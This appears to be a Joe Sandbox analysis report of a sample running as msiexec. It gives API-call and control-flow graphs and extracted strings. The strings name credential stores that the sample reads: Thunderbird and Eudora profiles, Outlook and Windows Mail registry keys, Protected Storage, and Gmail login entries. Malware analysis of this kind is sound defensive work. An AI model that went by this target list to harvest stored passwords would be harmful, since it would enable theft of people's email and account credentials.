40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 
33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA 
LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 
44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c 
WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                                            • strlen.MSVCRT ref: 00407F64
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindstrlen$FirstNext
                                                                                            • String ID: ACD
                                                                                            • API String ID: 379999529-620537770
                                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00401E8B
                                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                                            • strlen.MSVCRT ref: 00401F06
                                                                                            • memset.MSVCRT ref: 00401FB1
                                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                                            • memset.MSVCRT ref: 00402003
                                                                                            • sprintf.MSVCRT ref: 00402030
                                                                                            • memset.MSVCRT ref: 00402086
                                                                                            • memset.MSVCRT ref: 0040209B
                                                                                            • strlen.MSVCRT ref: 004020A1
                                                                                            • strlen.MSVCRT ref: 004020AF
                                                                                            • strlen.MSVCRT ref: 004020E2
                                                                                            • strlen.MSVCRT ref: 004020F0
                                                                                            • memset.MSVCRT ref: 00402018
                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                            • API String ID: 3833278029-4223776976
                                                                                            • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                            • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                            • API String ID: 745651260-375988210
                                                                                            • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                            • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                            Strings
                                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                            • pstorec.dll, xrefs: 00403C30
                                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                            • API String ID: 1197458902-317895162
                                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                            • String ID: k:v
                                                                                            • API String ID: 3662548030-4078055367
                                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044430B
                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                            • memset.MSVCRT ref: 00444379
                                                                                            • memset.MSVCRT ref: 00444394
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                            • strlen.MSVCRT ref: 004443DB
                                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                                            Strings
                                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                            • Store Root, xrefs: 004443A5
                                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                            • API String ID: 3203569119-2578778931
                                                                                            • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                            • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 2054149589-0
                                                                                            • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                            • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor_mbsicmpqsort
                                                                                            • String ID: /nosort$/sort
                                                                                            • API String ID: 882979914-1578091866
                                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004109F7
                                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                            • memset.MSVCRT ref: 00410A32
                                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                            • String ID:
                                                                                            • API String ID: 3143880245-0
                                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                            Control-flow Graph (basic blocks and edges):
                                                                                            control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                            Control-flow Graph (basic blocks and edges):
